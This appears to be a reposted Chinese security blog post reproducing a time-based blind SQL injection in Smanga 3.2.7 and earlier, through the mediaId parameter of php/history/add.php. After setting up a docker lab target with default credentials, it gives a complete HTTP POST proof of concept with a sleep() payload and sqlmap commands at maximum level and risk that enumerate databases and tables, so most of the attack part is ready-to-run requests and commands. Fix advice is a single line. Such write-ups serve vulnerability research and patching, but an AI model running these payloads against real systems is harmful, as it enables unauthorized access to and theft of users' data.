Smanga SQL注入漏洞一键拖库

admin

138717
文章

114
评论

2023年10月17日08:26:06评论55 views字数 2165阅读7分13秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

Smanga SQL注入漏洞

—

漏洞描述

Smanga版本3.2.7及之前版本中存在SQL注入漏洞。攻击者可以通过php/history/add.php中的mediaId、mangaId和userId参数执行任意代码并获取敏感信息。

—

靶场搭建

Smanga的github地址如下

https://github.com/lkw199711/smanga

下面使用docker安装smanga

拉取镜像

docker pull lkw199711/smanga:3.2.6

启动容器

docker run -itd --name smanga -p 3333:3306 -p 9797:80 -v /mnt:/mnt -v /route/smanga:/data lkw199711/smanga:3.2.6;

访问服务

http://192.168.30.112:9797/

Smanga SQL注入漏洞一键拖库

环境初始化之后跳转到登录页面

Smanga SQL注入漏洞一键拖库

默认用户名/密码：smanga/smanga

Smanga SQL注入漏洞一键拖库

—

漏洞复现

该漏洞是一个时间盲注漏洞，POC如下

POST /php/history/add.php HTTP/1.1Host: x.x.x.x:9797Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ak;q=0.8Cookie: thinkphp_show_page_trace=0|0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 198
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(5)%2C0)&timestamp=12123123&userId=1

延时5秒

Smanga SQL注入漏洞一键拖库

延时10秒

Smanga SQL注入漏洞一键拖库

证明漏洞存在

—

漏洞利用

将poc修改下，写入文件a,文件内容如下

POST /php/history/add.php HTTP/1.1Host: 192.168.1.11:9797Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ak;q=0.8Cookie: thinkphp_show_page_trace=0|0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=*&timestamp=12123123&userId=1

使用sqlmap获取数据库列表

sqlmap -r a --level 5 --risk 3 --dbs

Smanga SQL注入漏洞一键拖库

使用sqlmap获取smanga数据库的表

sqlmap -r a --level 5 --risk 3 -D smanga --tables

Smanga SQL注入漏洞一键拖库

—

修复建议

建议您更新当前系统或软件至最新版，完成漏洞的修复。

原文始发于微信公众号（AI与网安）：Smanga SQL注入漏洞一键拖库

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Smanga SQL注入漏洞一键拖库

【vulnhub】lampiao

MCP安全检查清单：AI⼯具⽣态系统安全指南 | Windows 11高危漏洞：300毫秒即可提权至管理员

Alibaba Sentinel的SSRF

一起站库分离的数据库对内扫描事件

docker逃逸方式总结分享

千万不能告诉DeepSeek的十件事

【密码喷洒攻防实战】Microsoft Entra SSO功能的滥用与防御

【漏洞与预防】畅捷通文件上传漏洞预防

实战攻防 | 1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

几千个产品的默认账号密码

发表评论